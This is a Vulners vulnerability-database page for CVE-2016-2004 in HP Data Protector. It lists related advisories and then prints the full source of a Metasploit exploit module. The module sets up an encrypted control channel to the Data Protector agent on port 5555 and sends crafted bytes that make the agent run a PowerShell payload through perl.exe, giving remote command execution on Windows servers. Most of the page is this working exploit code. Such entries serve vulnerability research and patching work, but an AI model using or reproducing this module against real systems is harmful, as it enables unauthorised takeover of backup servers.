Vulners
Lucene search
HP Data Protector Encrypted Communication Remote Command Execution
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | HP Data Protector A.09.00 - Arbitrary Command Execution | 26 May 201600:00 | – | zdt |
| HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) | 31 May 201600:00 | – | zdt |
 | CVE-2016-2004 | 26 May 201600:00 | – | circl |
 | HP Data Protector Remote Code Execution Vulnerability (CNVD-2016-02368) | 19 Apr 201600:00 | – | cnvd |
 | HP Data Protector Remote Command Execution (CVE-2016-2004) | 26 Oct 201600:00 | – | checkpoint_advisories |
 | CVE-2016-2004 | 21 Apr 201610:00 | – | cve |
 | CVE-2016-2004 | 21 Apr 201610:00 | – | cvelist |
 | HP Data Protector A.09.00 - Arbitrary Command Execution | 26 May 201600:00 | – | exploitdb |
| HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) | 31 May 201600:00 | – | exploitdb |
 | HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) | 31 May 201600:00 | – | exploitpack |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code execution exploit after establishing encrypted
control communications with a Data Protector agent. This allows exploitation of Data
Protector agents that have been configured to only use encrypted control communications.
This exploit works by executing the payload with Microsoft PowerShell so will only work
against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows
Server 2008 R2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jon Barg', # Reported vuln (originally discovery?) credited by HP
'Ian Lovering' # Metasploit module
],
'References' =>
[
[ 'CVE', '2016-2004' ],
[ 'URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'WfsDelay' => 30,
'RPORT' => 5555
},
'Privileged' => false,
'DisclosureDate' => '2016-04-18',
'DefaultTarget' => 0))
end
def check
# For the check command
connect
sock.put(rand_text_alpha_upper(64))
response = sock.get_once(-1)
disconnect
if response.nil?
return Exploit::CheckCode::Safe
end
service_version = Rex::Text.to_ascii(response).chop.chomp
if service_version =~ /HP Data Protector/
vprint_status(service_version)
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def generate_dp_payload
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ remove_comspec: true, encode_final_payload: true })
payload =
"\x32\x00\x01\x01\x01\x01\x01\x01" +
"\x00\x01\x00\x01\x00\x01\x00\x01" +
"\x01\x00\x20\x32\x38\x00\x5c\x70" +
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
"\x20\x2d\x65\x73\x79\x73\x74\x65" +
"\x6d('#{command}')\x00"
payload_length = [payload.length].pack('N')
return payload_length + payload
end
def exploit
# Main function
encryption_init_data =
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
print_status("Initiating connection")
# Open connection
connect
# Send init data
sock.put(encryption_init_data)
begin
buf = sock.get_once
rescue ::EOFError => e
elog(e)
end
print_status("Establishing encrypted channel")
# Create TLS / SSL context
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sock.sslctx.options = OpenSSL::SSL::OP_ALL
# Enable all ciphers as older versions of Data Protector only use
# some not enabled by default
sock.sslctx.ciphers = "ALL"
# Enable TLS / SSL
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect
print_status("Sending payload")
# Send payload
sock.put(generate_dp_payload(), {timeout: 5})
# Close socket
disconnect
print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2020 10:31Current
10High risk
Vulners AI Score10
CVSS 29.3
CVSS 39.8
EPSS0.94297